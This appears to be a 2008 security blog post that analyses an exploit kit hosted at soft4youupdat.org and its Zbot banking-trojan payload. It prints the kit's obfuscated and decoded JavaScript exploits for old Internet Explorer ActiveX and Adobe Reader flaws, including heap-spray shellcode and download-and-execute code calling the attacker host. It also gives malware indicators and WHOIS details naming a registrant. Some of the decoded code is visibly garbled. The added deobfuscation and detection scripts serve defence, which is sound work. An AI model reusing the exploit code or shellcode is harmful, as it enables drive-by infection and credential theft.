The analysis of exploit code hosted at soft4youupdat.org reveals a typical set of TTPs: malicious obfuscated JavaScript, browser-based IE exploits, banking credential-stealing malware, and ISPs with dubious reputations. The story follows...
A request for http://soft4youupdat.org/counts/index.php returns three sections of obfuscated exploit code and an iframe pointing back to hxxp://soft4youupdat(dot)org.
(1)
<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>
(2)
<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>
(3)
<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>
(4)
<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>
The JavaScript replace() method is used to obfuscate the exploit code. The syntax of replace() is
stringObject.replace(findstring, newstring)
A 'g' flag makes the search global (every occurrence is replaced, not just the first), and an 'i' flag makes the search case-insensitive.
Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ''. The decoded section returns a string of escaped hexadecimal characters.
eval('\x61\x7a\x20\x3d\x20\x6e\x65\x77\x20\x41\x72\x72\x61\x79\x28\x29\x3b\x61\x7a\x2e\x70\x75\x73\x68\x28\x27\x68\x5e\x74\x26\x74\x70\x29…….truncated…….\x7b\x7d\x7d')
The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.
az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); try { t.type = 1; q.open('GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);q.send(); t.open(); t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));b.open('G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}}
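As an added illustration (not code from the page or from the exploit kit), the following Python script statically undoes both replace()-based layers seen in Block 1: it strips the junk token and expands the \xNN escapes, then removes the punctuation noise from each string literal, without ever passing anything to eval. The stage-2 literals in the sample are copied from the decoded block above; the stage-1 wrapper around them is reconstructed here because the page's copy is truncated.

```python
import re

# Constructed sample: the stage-2 string literals below are copied from the
# page's decoded Block 1; the surrounding script is shortened to the two calls
# that carry the indicators (download URL and the RDS.DataSpace CLSID).
NOISE = r"/\!|@|#|\$|%|\^|&|\*|\(|\)/ig"
INNER_SCRIPT = (
    r"az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'"
    r".replace(" + NOISE + r", ''));z.setAttribute('clas@s!!i$!d@$'.replace(" + NOISE + r", ''), "
    r"'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(" + NOISE + r", ''));"
)

def build_stage1(inner, token="Tgwm"):
    """Rebuild the kit's outer layer (stage 1): every character becomes a \\xNN
    escape and TOKEN is sprinkled in front of each one, so the page carries no
    readable 'http' or 'clsid' until replace()+eval run in the browser."""
    escaped = "".join(token + "\\x%02x" % ord(c) for c in inner)
    return "<script>eval('%s'.replace(/%s/g, ''));</script>" % (escaped, token)

# eval('<body>'.replace(/<token>/g, ''))  -- matched statically, never executed.
STAGE1 = re.compile(r"eval\('((?:[^'\\]|\\.)*)'\.replace\(/(\w+)/g,\s*''\)\)")
# '<noisy>'.replace(/a|b|c/ig, '')  -- each alternative is one (maybe escaped) char.
STAGE2 = re.compile(r"'([^']*)'\.replace\(/((?:\\?.\|)*\\?.)/ig,\s*''\)")

def decode_stage1(html):
    """Strip the junk token and expand the \\xNN escapes; returns the inner script."""
    m = STAGE1.search(html)
    if not m:
        return None
    body = m.group(1).replace(m.group(2), "")
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda h: chr(int(h.group(1), 16)), body)

def decode_stage2(script):
    """Replace each 'noisy'.replace(/.../ig, '') call with the cleaned literal."""
    def clean(m):
        junk = {alt[-1] for alt in m.group(2).split("|")}  # drop escaping backslash
        return "'" + "".join(c for c in m.group(1) if c not in junk) + "'"
    return STAGE2.sub(clean, script)

def deobfuscate(html):
    inner = decode_stage1(html)
    return None if inner is None else decode_stage2(inner)

def extract_indicators(script):
    """Pull the download URL and ActiveX CLSIDs out of the decoded script."""
    return {
        "urls": re.findall(r"https?://[^\s'\"<>]+", script),
        "clsids": re.findall(r"clsid:[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}", script),
    }

if __name__ == "__main__":
    print(extract_indicators(deobfuscate(build_stage1(INNER_SCRIPT))))
```

The same two regexes cover Blocks 2 and 4, which use the identical noise alphabet; only the junk token in the outer layer changes per block.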
Exploit Block 2
The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().
function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://127.0.0.1"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}
Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeting a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe Reader's JavaScript engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus 1.3.3.12, a desktop publishing application for Linux/Unix; Scribus provides a step-by-step guide to adding JavaScript to a PDF. The creation date is 8-6-08.
13 0 obj
<>
stream
[filter FlateDecode has been applied to the JavaScript bitstream]
endstream
endobj
12 0 obj
<>
endobj
14 0 obj
<<
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
The tool pdftk (the PDF Toolkit) can be used to inflate the FlateDecode-compressed JavaScript stream. The tool syntax is:
pdftk input.pdf output output.pdf uncompress
The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.
function rvcfcd208495d565e()
{
var rvc4ca4238a0b9238 = new Array();
function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
{
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">
Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique, decoding to reveal three buffer overflow exploits:
• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)
The shellcode payload for all three exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.
var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){while (sssprassydddbSliiide.length * 2 < sssprassydddbsliiide =" sssprassydddbSliiide.substring(0," hpsdyytttscess =" 0x0c0c0c0c;var" hadttdtsize =" 0x400000;var" payfdlytyusade =" Shellcode.length" tggter =" payfdLytyusade" saruuysaddize =" hadttdtSize" sssprassydddbsliiide =" unescape(" prrerat =" new" sssprassydddbsliiide =" geSpyrrSlirrdep(sssprassydddbSliiide," kilrrer =" hpsdyytttscess" hsttiicks =" kilrrer" i =" 0;" ugric =" 
unescape(" xyz =" 0x40000;while(ugric.length" ugric =" ugric.substring(0," bublic =" new" i =" bublic;">');zorro = Math.ceil(0xd0d0d0d);zorro = document.scripts[0].createControlRange().length;}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement("object");mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");var mms="";for(var i=0; i < body =" '';var buf1 = '';for (i = 1; i <= 1945; i++){buf1 = buf1 + unescape(" href="http://google.com/">
Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.
Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes
The malware is a Zbot trojan which steals online banking information and downloads additional malware.
The following files are created:
%System%\ntos.exe
  MD5: B01F2D6531F9EC917E8996ED5962DB48
  Size: 308,736 bytes
%System%\wsnpoem\audio.dll
%System%\wsnpoem\video.dll
The following registry value is modified to launch the malware at startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "%System%\userinit.exe,%System%\ntos.exe,"
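An added check (not from the page) for the Userinit persistence described above: it parses the comma-separated value and reports any entry that is not the legitimate userinit.exe in the system directory. The sample values are constructed from the page's write-up, and the read_live_userinit helper only works on Windows.

```python
import ntpath

# Winlogon\Userinit is a comma-separated list that winlogon runs at logon. A
# clean value holds only the real userinit.exe; Zbot appends its own binary
# (ntos.exe on this page) so it is started alongside it. Samples are constructed.
LEGIT_NAME = "userinit.exe"

def suspicious_userinit_entries(value, system_dir=r"C:\Windows\system32"):
    """Return every Userinit entry that is not <system_dir>\\userinit.exe.
    Handles the normal trailing comma, surrounding quotes/whitespace, mixed
    case and the %System% placeholder used in the page's write-up."""
    flagged = []
    for raw in value.split(","):
        entry = raw.strip().strip('"')
        if not entry:
            continue  # the trailing comma leaves an empty field
        path = entry.replace("%System%", system_dir)
        head, tail = ntpath.split(path)
        if tail.lower() != LEGIT_NAME or head.lower() != system_dir.lower():
            flagged.append(path)
    return flagged

def read_live_userinit():
    """Windows only: read the current value via the standard winreg module."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon") as key:
        value, _ = winreg.QueryValueEx(key, "Userinit")
    return value

if __name__ == "__main__":
    # The value this page reports for the Zbot sample.
    print(suspicious_userinit_entries(r"%System%\userinit.exe,%System%\ntos.exe,"))
```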
VirusTotal showed a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)].
Domain Analysis
The domain soft4youupdat.org was registered 11-20-08 at Everyones Internet, Ltd.
Domain ID: D154732571-LROR
Domain Name: SOFT4YOUUPDAT.ORG
Created On: 20-Nov-2008 12:59:45 UTC
Last Updated On: 20-Nov-2008 13:19:16 UTC
Expiration Date: 20-Nov-2009 12:59:45 UTC
Sponsoring Registrar: Everyones Internet, Ltd. (R1381-LROR)
Status: TRANSFER PROHIBITED
Registrant ID: tul8MyjB2Dv7rqIF
Registrant Name: Vladimir Mashkov
Registrant Organization: N/A
Registrant Street1: st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City: Moscow
Registrant State/Province: Moscow
Registrant Postal Code: 10010
Registrant Country: RU
Registrant Phone: +7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: andrea12a@inbox.ru
The domain soft4youupdat.org currently resolves to 67.228.139.26 which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351, 67.228.128.0/18).
aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {0.0.0.0/0}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
notify: noc@softlayer.com
mnt-by: MAINT-AS36351
changed: ipadmin@softlayer.com 20060110
source: RADB
SOFTLAYER Technologies Inc leased this IP space to Innovation IT Solutions Corp, an international communications company headquartered in London, UK.
Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1)
67.228.139.0 - 67.228.139.127
SOFTLAYER Technologies Inc is listed by StopBadware.org in its top 10 worst network block owners, and the McColo Cyber Crime USA – V2.0 report lists the ISP among the top 5 worst network block owners. Both Innovation IT Solutions Corp and SOFTLAYER Technologies Inc have previously been tied to RBN activity and the Russian cyberwar on Georgia.
Friday, December 19, 2008
soft4youupdat.org Exploit Analysis